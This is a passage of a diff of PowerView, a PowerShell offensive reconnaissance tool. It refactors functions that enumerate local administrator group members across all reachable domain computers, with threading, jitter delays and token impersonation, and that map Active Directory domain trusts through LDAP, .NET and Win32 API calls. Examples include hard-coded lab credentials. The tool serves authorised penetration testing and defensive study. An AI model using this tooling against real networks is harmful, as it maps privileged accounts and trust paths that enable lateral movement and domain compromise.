+Find-DomainLocalGroupMember -Domain dev.testlab.local
 
-        The maximum concurrent threads to execute.
+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-EnumerateLocalAdmin
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
 
-        Enumerates the members of local administrators for all machines
-        in the current domain.
+Enumerates the local group memberships for all reachable machines the dev.testlab.local
+domain using the alternate credentials.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Invoke-EnumerateLocalAdmin -Threads 10
+PowerView.LocalGroupMember.API
 
-        Threaded local admin enumeration, replaces Invoke-EnumerateLocalAdminThreaded
+Custom PSObject with translated group property fields from API results.
 
-    .LINK
+PowerView.LocalGroupMember.WinNT
 
-        http://blog.harmj0y.net/
+Custom PSObject with translated group property fields from WinNT results.
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.LocalGroupMember.API')]
+    [OutputType('PowerView.LocalGroupMember.WinNT')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
+        $ComputerSearchBase,
 
-        [Switch]
-        $NoPing,
-
-        [UInt32]
-        $Delay = 0,
-
-        [Double]
-        $Jitter = .3,
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
+        [String]
+        $ComputerOperatingSystem,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
         [String]
-        $OutFile,
+        $ComputerServicePack,
 
-        [Switch]
-        $NoClobber,
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
+        [String]
+        $ComputerSiteName,
 
-        [Switch]
-        $TrustGroups,
+        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $GroupName = 'Administrators',
 
-        [Switch]
-        $DomainOnly,
+        [ValidateSet('API', 'WinNT')]
+        [Alias('CollectionMethod')]
+        [String]
+        $Method = 'API',
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Domain,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $DomainController,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $SearchForest,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,100)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $Threads,
+        $ServerTimeLimit,
 
         [Switch]
-        $API
-    )
-
-    begin {
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
+        $Tombstone,
 
-        # random object for delay
-        $RandNo = New-Object System.Random
-
-        Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay"
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-        # if we're using a host list, read the targets in and add them to the target list
-        if($ComputerFile) {
-            $ComputerName = Get-Content -Path $ComputerFile
-        }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $Delay = 0,
 
-        if(!$ComputerName) { 
-            [array]$ComputerName = @()
+        [ValidateRange(0.0, 1.0)]
+        [Double]
+        $Jitter = .3,
 
-            if($Domain) {
-                $TargetDomains = @($Domain)
-            }
-            elseif($SearchForest) {
-                # get ALL the domains in the forest to search
-                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-            }
-            else {
-                # use the local domain
-                $TargetDomains = @( (Get-NetDomain).name )
-            }
+        [Int]
+        [ValidateRange(1, 100)]
+        $Threads = 20
+    )
 
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for hosts"
-                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
-            }
-            
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
-            }
+    BEGIN {
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
+        }
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
         }
-
-        # delete any existing output file if it already exists
-        if(!$NoClobber) {
-            if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }
+        else {
+            Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain'
+            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
         }
-
-        if($TrustGroups) {
-            
-            Write-Verbose "Determining domain trust groups"
-
-            # find all group names that have one or more users in another domain
-            $TrustGroupNames = Find-ForeignGroup -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.GroupName } | Sort-Object -Unique
-
-            $TrustGroupsSIDs = $TrustGroupNames | ForEach-Object { 
-                # ignore the builtin administrators group for a DC (S-1-5-32-544)
-                # TODO: ignore all default built in sids?
-                Get-NetGroup -Domain $Domain -DomainController $DomainController -GroupName $_ -FullData | Where-Object { $_.objectsid -notmatch "S-1-5-32-544" } | ForEach-Object { $_.objectsid }
-            }
-
-            # query for the primary domain controller so we can extract the domain SID for filtering
-            $DomainSID = Get-DomainSID -Domain $Domain -DomainController $DomainController
+        Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-DomainLocalGroupMember] No hosts found to enumerate'
         }
 
-        # script block that enumerates a server
+        # the host enumeration block we're using to enumerate all servers
         $HostEnumBlock = {
-            param($ComputerName, $Ping, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)
+            Param($ComputerName, $GroupName, $Method, $TokenHandle)
 
-            # optionally check if the server is up first
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
+            if ($TokenHandle) {
+                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
             }
-            if($Up) {
-                # grab the users for the local admins on this server
-                if($API) {
-                    $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName -API
-                }
-                else {
-                    $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName
-                }
-
-                # if we just want to return cross-trust users
-                if($DomainSID) {
-                    # get the local machine SID
-                    $LocalSID = ($LocalAdmins | Where-Object { $_.SID -match '.*-500$' }).SID -replace "-500$"
-                    Write-Verbose "LocalSid for $ComputerName : $LocalSID"
-                    # filter out accounts that begin with the machine SID and domain SID
-                    #   but preserve any groups that have users across a trust ($TrustGroupSIDS)
-                    $LocalAdmins = $LocalAdmins | Where-Object { ($TrustGroupsSIDs -contains $_.SID) -or ((-not $_.SID.startsWith($LocalSID)) -and (-not $_.SID.startsWith($DomainSID))) }
-                }
-
-                if($DomainOnly) {
-                    $LocalAdmins = $LocalAdmins | Where-Object {$_.IsDomain}
-                }
 
-                if($LocalAdmins -and ($LocalAdmins.Length -ne 0)) {
-                    # output the results to a csv if specified
-                    if($OutFile) {
-                        $LocalAdmins | Export-PowerViewCSV -OutFile $OutFile
-                    }
-                    else {
-                        # otherwise return the user objects
-                        $LocalAdmins
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    $NetLocalGroupMemberArguments = @{
+                        'ComputerName' = $TargetComputer
+                        'Method' = $Method
+                        'GroupName' = $GroupName
                     }
-                }
-                else {
-                    Write-Verbose "[!] No users returned from $ComputerName"
+                    Get-NetLocalGroupMember @NetLocalGroupMemberArguments
                 }
             }
-        }
-    }
-
-    process {
-
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
 
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
-                'OutFile' = $OutFile
-                'DomainSID' = $DomainSID
-                'TrustGroupsSIDs' = $TrustGroupsSIDs
+            if ($TokenHandle) {
+                Invoke-RevertToSelf
             }
+        }
 
-            # kick off the threaded script block + arguments
-            if($API) {
-                $ScriptParams['API'] = $True
+        $LogonToken = $Null
+        if ($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential
             }
-
-            if($DomainOnly) {
-                $ScriptParams['DomainOnly'] = $True
+            else {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
             }
-         
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
+    }
 
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
-            }
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+            Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter"
             $Counter = 0
+            $RandNo = New-Object System.Random
 
-            ForEach ($Computer in $ComputerName) {
-
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
 
-                $ScriptArgs = @($Computer, $False, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)
+                Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken
+            }
+        }
+        else {
+            Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads"
 
-                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $ScriptArgs
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'GroupName' = $GroupName
+                'Method' = $Method
+                'TokenHandle' = $LogonToken
             }
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+        }
+    }
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
         }
     }
 }
@@ -12515,99 +17305,197 @@ function Invoke-EnumerateLocalAdmin {
 #
 ########################################################
 
-function Get-NetDomainTrust {
+function Get-DomainTrust {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Return all domain trusts for the current domain or
-        a specified domain.
+Return all domain trusts for the current domain or a specified domain.
 
-    .PARAMETER Domain
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect  
 
-        The domain whose trusts to enumerate, defaults to the current domain.
+.DESCRIPTION
 
-    .PARAMETER DomainController
+This function will enumerate domain trust relationships for the current (or a remote)
+domain using a number of methods. By default, the .NET method GetAllTrustRelationships()
+is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
+is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
+'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
+Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Domain
 
-    .PARAMETER ADSpath
+Specifies the domain to query for trusts, defaults to the current domain.
 
-        The LDAP source to search through, e.g. "LDAP://DC=testlab,DC=local".
-        Useful for global catalog queries ;)
+.PARAMETER API
 
-    .PARAMETER API
+Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
+.NET methods.
 
-        Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts.
+.PARAMETER LDAP
 
-    .PARAMETER LDAP
+Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
 
-        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. 
-        More likely to get around network segmentation, but not as accurate.
+.PARAMETER LDAPFilter
 
-    .PARAMETER PageSize
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Properties
 
-    .EXAMPLE
+Specifies the properties of the output object to retrieve from the server.
 
-        PS C:\> Get-NetDomainTrust
+.PARAMETER SearchBase
 
-        Return domain trusts for the current domain using built in .NET methods.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-    .EXAMPLE
+.PARAMETER Server
 
-        PS C:\> Get-NetDomainTrust -Domain "prod.testlab.local"
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Return domain trusts for the "prod.testlab.local" domain using .NET methods
+.PARAMETER SearchScope
 
-    .EXAMPLE
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        PS C:\> Get-NetDomainTrust -LDAP -Domain "prod.testlab.local" -DomainController "PRIMARY.testlab.local"
+.PARAMETER ResultPageSize
 
-        Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP
-        queries, reflecting queries through the "Primary.testlab.local" domain controller,
-        using .NET methods.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .EXAMPLE
+.PARAMETER ServerTimeLimit
 
-        PS C:\> Get-NetDomainTrust -API -Domain "prod.testlab.local"
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.
+.PARAMETER Tombstone
 
-    .EXAMPLE
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        PS C:\> Get-NetDomainTrust -API -DomainController WINDOWS2.testlab.local
+.PARAMETER FindOne
 
-        Return domain trusts reachable from the WINDOWS2 machine through API calls.
-#>
+Only return one result object.
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0, ValueFromPipeline=$True)]
-        [String]
-        $Domain,
+.PARAMETER Credential
 
-        [String]
-        $DomainController,
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainTrust
+
+Return domain trusts for the current domain using built in .NET methods.
+
+.EXAMPLE
+
+Get-DomainTrust -Domain "prod.testlab.local"
+
+Return domain trusts for the "prod.testlab.local" domain using .NET methods
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainTrust -LDAP -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred
+
+Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP
+queries, binding to the PRIMARY.testlab.local server for queries, and using the specified
+alternate credenitals.
+
+.EXAMPLE
+
+Get-DomainTrust -API -Domain "prod.testlab.local"
+
+Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.
+
+.OUTPUTS
+
+PowerView.DomainTrust.NET
 
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+PowerView.DomainTrust.LDAP
+
+Custom PSObject with translated domain LDAP trust result fields.
+
+PowerView.DomainTrust.API
+
+Custom PSObject with translated domain API trust result fields.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.DomainTrust.NET')]
+    [OutputType('PowerView.DomainTrust.LDAP')]
+    [OutputType('PowerView.DomainTrust.API')]
+    [CmdletBinding(DefaultParameterSetName = 'NET')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ADSpath,
+        $Domain,
 
+        [Parameter(ParameterSetName = 'API')]
         [Switch]
         $API,
 
+        [Parameter(ParameterSetName = 'LDAP')]
         [Switch]
         $LDAP,
 
-        [ValidateRange(1,10000)] 
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [Parameter(ParameterSetName = 'API')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
 
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
+
+        [Parameter(ParameterSetName = 'LDAP')]
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
+    BEGIN {
         $TrustAttributes = @{
             [uint32]'0x00000001' = 'non_transitive'
             [uint32]'0x00000002' = 'uplevel_only'
@@ -12621,33 +17509,61 @@ function Get-NetDomainTrust {
             [uint32]'0x00000200' = 'cross_organization_no_tgt_delegation'
             [uint32]'0x00000400' = 'pim_trust'
         }
+
+        $LdapSearcherArguments = @{}
+        if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential }
     }
 
-    process {
+    PROCESS {
+        if ($PsCmdlet.ParameterSetName -ne 'API') {
+            $NetSearcherArguments = @{}
+            if ($Domain -and $Domain.Trim() -ne '') {
+                $SourceDomain = $Domain
+            }
+            else {
+                if ($PSBoundParameters['Credential']) {
+                    $SourceDomain = (Get-Domain -Credential $Credential).Name
+                }
+                else {
+                    $SourceDomain = (Get-Domain).Name
+                }
+            }
 
-        if(-not $Domain) {
-            # if not domain is specified grab the current domain
-            $SourceDomain = (Get-NetDomain -Credential $Credential).Name
+            $NetSearcherArguments['Domain'] = $SourceDomain
+            if ($PSBoundParameters['Credential']) { $NetSearcherArguments['Credential'] = $Credential }
         }
         else {
-            $SourceDomain = $Domain
+            if ($Domain -and $Domain.Trim() -ne '') {
+                $SourceDomain = $Domain
+            }
+            else {
+                $SourceDomain = $Env:USERDNSDOMAIN
+            }
         }
 
-        if($LDAP -or $ADSPath) {
-
-            $TrustSearcher = Get-DomainSearcher -Domain $SourceDomain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -ADSpath $ADSpath
+        if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
+            # if we're searching for domain trusts through LDAP/ADSI
+            $TrustSearcher = Get-DomainSearcher @LdapSearcherArguments
+            $SourceSID = Get-DomainSID @NetSearcherArguments
 
-            $SourceSID = Get-DomainSID -Domain $SourceDomain -DomainController $DomainController
-
-            if($TrustSearcher) {
+            if ($TrustSearcher) {
 
                 $TrustSearcher.Filter = '(objectClass=trustedDomain)'
 
-                $Results = $TrustSearcher.FindAll()
+                if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() }
+                else { $Results = $TrustSearcher.FindAll() }
                 $Results | Where-Object {$_} | ForEach-Object {
                     $Props = $_.Properties
                     $DomainTrust = New-Object PSObject
-                    
+
                     $TrustAttrib = @()
                     $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] }
 
@@ -12657,8 +17573,10 @@ function Get-NetDomainTrust {
                         2 { 'Outbound' }
                         3 { 'Bidirectional' }
                     }
+
                     $ObjectGuid = New-Object Guid @(,$Props.objectguid[0])
                     $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value
+
                     $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
                     $DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID
                     $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0]
@@ -12666,86 +17584,93 @@ function Get-NetDomainTrust {
                     $DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}"
                     $DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',')
                     $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction"
-                    $DomainTrust.PSObject.TypeNames.Add('PowerView.DomainTrustLDAP')
+                    $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP')
                     $DomainTrust
                 }
-                $Results.dispose()
+                if ($Results) {
+                    try { $Results.dispose() }
+                    catch {
+                        Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_"
+                    }
+                }
                 $TrustSearcher.dispose()
             }
         }
-        elseif($API) {
-            if(-not $DomainController) {
-                $DomainController = Get-NetDomainController -Credential $Credential -Domain $SourceDomain | Select-Object -First 1 | Select-Object -ExpandProperty Name
+        elseif ($PsCmdlet.ParameterSetName -eq 'API') {
+            # if we're searching for domain trusts through Win32 API functions
+            if ($PSBoundParameters['Server']) {
+                $TargetDC = $Server
+            }
+            elseif ($Domain -and $Domain.Trim() -ne '') {
+                $TargetDC = $Domain
+            }
+            else {
+                # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior
+                $TargetDC = $Null
             }
 
-            if($DomainController) {
-                # arguments for DsEnumerateDomainTrusts
-                $PtrInfo = [IntPtr]::Zero
+            # arguments for DsEnumerateDomainTrusts
+            $PtrInfo = [IntPtr]::Zero
 
-                # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND
-                $Flags = 63
-                $DomainCount = 0
+            # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND
+            $Flags = 63
+            $DomainCount = 0
 
-                # get the trust information from the target server
-                $Result = $Netapi32::DsEnumerateDomainTrusts($DomainController, $Flags, [ref]$PtrInfo, [ref]$DomainCount)
+            # get the trust information from the target server
+            $Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount)
 
-                # Locate the offset of the initial intPtr
-                $Offset = $PtrInfo.ToInt64()
+            # Locate the offset of the initial intPtr
+            $Offset = $PtrInfo.ToInt64()
 
-                # 0 = success
-                if (($Result -eq 0) -and ($Offset -gt 0)) {
+            # 0 = success
+            if (($Result -eq 0) -and ($Offset -gt 0)) {
 
-                    # Work out how much to increment the pointer by finding out the size of the structure
-                    $Increment = $DS_DOMAIN_TRUSTS::GetSize()
+                # Work out how much to increment the pointer by finding out the size of the structure
+                $Increment = $DS_DOMAIN_TRUSTS::GetSize()
 
-                    # parse all the result structures
-                    for ($i = 0; ($i -lt $DomainCount); $i++) {
-                        # create a new int ptr at the given offset and cast the pointer as our result structure
-                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
-                        $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS
+                # parse all the result structures
+                for ($i = 0; ($i -lt $DomainCount); $i++) {
+                    # create a new int ptr at the given offset and cast the pointer as our result structure
+                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                    $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS
 
-                        $Offset = $NewIntPtr.ToInt64()
-                        $Offset += $Increment
+                    $Offset = $NewIntPtr.ToInt64()
+                    $Offset += $Increment
 
-                        $SidString = ""
-                        $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+                    $SidString = ''
+                    $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-                        if($Result -eq 0) {
-                            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
-                        }
-                        else {
-                            $DomainTrust = New-Object PSObject
-                            $DomainTrust | Add-Member Noteproperty 'SourceDomain' $SourceDomain
-                            $DomainTrust | Add-Member Noteproperty 'SourceDomainController' $DomainController
-                            $DomainTrust | Add-Member Noteproperty 'NetbiosDomainName' $Info.NetbiosDomainName
-                            $DomainTrust | Add-Member Noteproperty 'DnsDomainName' $Info.DnsDomainName
-                            $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags
-                            $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex
-                            $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType
-                            $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes
-                            $DomainTrust | Add-Member Noteproperty 'DomainSid' $SidString
-                            $DomainTrust | Add-Member Noteproperty 'DomainGuid' $Info.DomainGuid
-                            $DomainTrust.PSObject.TypeNames.Add('PowerView.APIDomainTrust')
-                            $DomainTrust
-                        }
+                    if ($Result -eq 0) {
+                        Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+                    }
+                    else {
+                        $DomainTrust = New-Object PSObject
+                        $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
+                        $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName
+                        $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName
+                        $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags
+                        $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex
